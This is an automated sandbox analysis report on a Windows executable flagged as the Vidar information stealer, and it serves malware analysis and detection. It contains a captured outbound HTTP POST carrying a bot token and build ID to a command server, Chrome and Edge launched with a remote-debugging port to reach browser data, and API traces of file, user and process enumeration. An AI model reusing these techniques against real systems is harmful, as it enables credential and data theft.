2024-11-29 11:29:21 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IIDHJDGCGDAAKEBGDBKFCont
2024-11-29 11:29:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:27:16
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	419'328 bytes
MD5 hash:	2D79AEC368236C7741A6904E9ADFF58F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:27:34
Start date:	29/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:27:37
Start date:	29/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2220,i,4289607260128770584,8456024223546190286,262144 /prefetch:8
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:27:50
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:27:50
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2308,i,9625415575329100081,14063141058506753457,262144 /prefetch:3
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:27:50
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:27:51
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:3
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	06:27:55
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:27:55
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:28:51
Start date:	29/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.6%
Total number of Nodes:	208
Total number of Limit Nodes:	1

Executed Functions

Function 0041FEA7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDesktopA.USER32 ref: 0041FEC7
memset.MSVCRT ref: 0041FEDC
memset.MSVCRT ref: 0041FF4D
CreateProcessA.KERNEL32 ref: 00420036

Strings

OCALAPPDATA, xrefs: 0041FF91, 0041FF97, 0041FFA5, 0041FFAA

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Creatememset$DesktopProcess
String ID: OCALAPPDATA
API String ID: 2911880311-2158123194
Opcode ID: 62d630cf881455325200ab1b9aff70751af170e7d5f4d1dd2174abe64b888b6e
Instruction ID: 0b3de4e1580c6261d2f7d56bcdc20e0164fd2d98cef23774df56ab7278ba45d5
Opcode Fuzzy Hash: 62d630cf881455325200ab1b9aff70751af170e7d5f4d1dd2174abe64b888b6e
Instruction Fuzzy Hash: AB51C472904700DBDB04DF28DC81AAABBF5AF98300F04416DF849A3312DB70EA80CB58

Function 0043A85B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(?,?), ref: 0043A8C2
memset.MSVCRT ref: 0043A8DA
memset.MSVCRT ref: 0043A8EB

Strings

Xy'I, xrefs: 0043A90B
%s\*.*, xrefs: 0043A899, 0043A89F, 0043A8AC

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memset$FileFindFirst
String ID: %s\*.*$Xy'I
API String ID: 2180624105-4031427208
Opcode ID: bef613ac99ed4cd5309bc209674941006cbff660d7927f5a660b2ea6c11159cb
Instruction ID: d81f27f8102c9568b4826317cd6ef0404a3d0b002648320992f9d14f0f126744
Opcode Fuzzy Hash: bef613ac99ed4cd5309bc209674941006cbff660d7927f5a660b2ea6c11159cb
Instruction Fuzzy Hash: 1311D0B59002199BD710CBA9DC95D9737FDEB86310B050179BA08D7382E634AE44CFA6

Function 00423AC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00423B93

Strings

d=E, xrefs: 00423AD9
d=E, xrefs: 00423B62

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID: d=E$d=E
API String ID: 1974802433-3333608182
Opcode ID: 4a2db1b41bd06cb3b949c408def3f64e7acf423632d9f7a974eaf61693d26023
Instruction ID: c314923d8a0717e47e30c4f8c9f4a4ea5251c4debaca70b179ec60c09e0cb819
Opcode Fuzzy Hash: 4a2db1b41bd06cb3b949c408def3f64e7acf423632d9f7a974eaf61693d26023
Instruction Fuzzy Hash: 6C212DB27002159FDB14DB6CDC91A6D73B9EBC9605F04442DA82AE3352EE34EE18CB58

Function 00429305 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004293B6

Strings

/x%D, xrefs: 00429348
\*.*, xrefs: 00429353, 00429359, 0042936F

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID: /x%D$\*.*
API String ID: 1974802433-2638526378
Opcode ID: 3b7f67f0607212a2e8ebbcb8ca0481319d6aea30db6146d81f4e033baa9e40c9
Instruction ID: a245b19d6da869d444f44430e2b1cb44cb39c1d56f678c4ecab4f6857f77e69b
Opcode Fuzzy Hash: 3b7f67f0607212a2e8ebbcb8ca0481319d6aea30db6146d81f4e033baa9e40c9
Instruction Fuzzy Hash: 632150B2600218AFCB04DB6CEC91EA973B9EBC8745B040458E416E3352EA34EE05CB58

Function 004022FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004025E5

Strings

\*.*, xrefs: 00402384, 0040238A, 004023A9

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID: \*.*
API String ID: 1974802433-1173974218
Opcode ID: 6c0f6e40f7656dc4f9e930a96511ac21cadf279f6f3a8f1b84d087ded89e2c0f
Instruction ID: 817365079b64f86dd5f2691e91b9a3ddbac61f4b55a9e4ab2a1f459605ec19e7
Opcode Fuzzy Hash: 6c0f6e40f7656dc4f9e930a96511ac21cadf279f6f3a8f1b84d087ded89e2c0f
Instruction Fuzzy Hash: 89412976A01708CFC704DB5CDC91EA877B5BF95394B0901A8E929D7362D670EA09CB48

Function 0042ED59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000000), ref: 0042ED8C

Strings

Tv)>, xrefs: 0042ED5D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: NameUser
String ID: Tv)>
API String ID: 2645101109-2960183627
Opcode ID: b36458ee66799f8a1871c2c726d2f13c41f2a4d8d68f18e28e4d1d3a282bbff2
Instruction ID: 60bd1c9c5f05273e0424e2c52975cee27000371f3c630ae1d2b997ca714f0b9c
Opcode Fuzzy Hash: b36458ee66799f8a1871c2c726d2f13c41f2a4d8d68f18e28e4d1d3a282bbff2
Instruction Fuzzy Hash: E9E046F23002142FD204975DAC80FAB779DCBC8269B0A0075F608C7311D238ACA596AA

Function 0042EE1F Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 0042EE31
wsprintfA.USER32 ref: 0042EE73

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: a7f3a64f85efc30cf96aff29990b38053308bc5fdb8e36b9ef575e3c2070f3bb
Instruction ID: 1660de946c545f62e8e7feed56ea28d4bac36916aa83be0163193ad68dfdc243
Opcode Fuzzy Hash: a7f3a64f85efc30cf96aff29990b38053308bc5fdb8e36b9ef575e3c2070f3bb
Instruction Fuzzy Hash: 77F0E9F66022345FD200EF04EE86D96776CEF86215B0A0625FD14B7311D626AD25C6BA

Function 00430375 Relevance: 3.0, APIs: 2, Instructions: 26processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00430397
Process32First.KERNEL32(00000000), ref: 004303A6

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 791c9ad2a6c274af888a64c6002a4da7ed0726b43802607652db9a13e8c083d2
Instruction ID: 67547356ca5b7fc277b6cb5c7f51db93bf872eaed0131fa36dbf643112c5e18e
Opcode Fuzzy Hash: 791c9ad2a6c274af888a64c6002a4da7ed0726b43802607652db9a13e8c083d2
Instruction Fuzzy Hash: DCF065732026029FE3108B68EC4DF667BE8DF49305F140128F501DB2E1DB34D860C7A9

Function 004024A9 Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 79eb9627fab6b144517221ab6bbc0b9a7c444b89a3c7fb08ec041314d3100e9e
Instruction ID: f75aed0b1d1e162924e4ebdbc172b8d49780232cc921cbccd888f32bff861f27
Opcode Fuzzy Hash: 79eb9627fab6b144517221ab6bbc0b9a7c444b89a3c7fb08ec041314d3100e9e
Instruction Fuzzy Hash: B6410576A017088FC704DF5CDC91EA977B5BBC9784B094069E92AD7362DA70FA09CB44

Function 00426E63 Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00426F47

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 5d080295a2979537de853f50302e2bd9a86a039f6a76826fb253456ba8864eb8
Instruction ID: cd49d3ec62cf6a293e3b75d498c2b0704ff449cafc62a06c9fb036c2c43035ee
Opcode Fuzzy Hash: 5d080295a2979537de853f50302e2bd9a86a039f6a76826fb253456ba8864eb8
Instruction Fuzzy Hash: 023134357003688FC708EF6DDC80E5A37B9EF99710B050565E82AC7372DA24EF48CA68

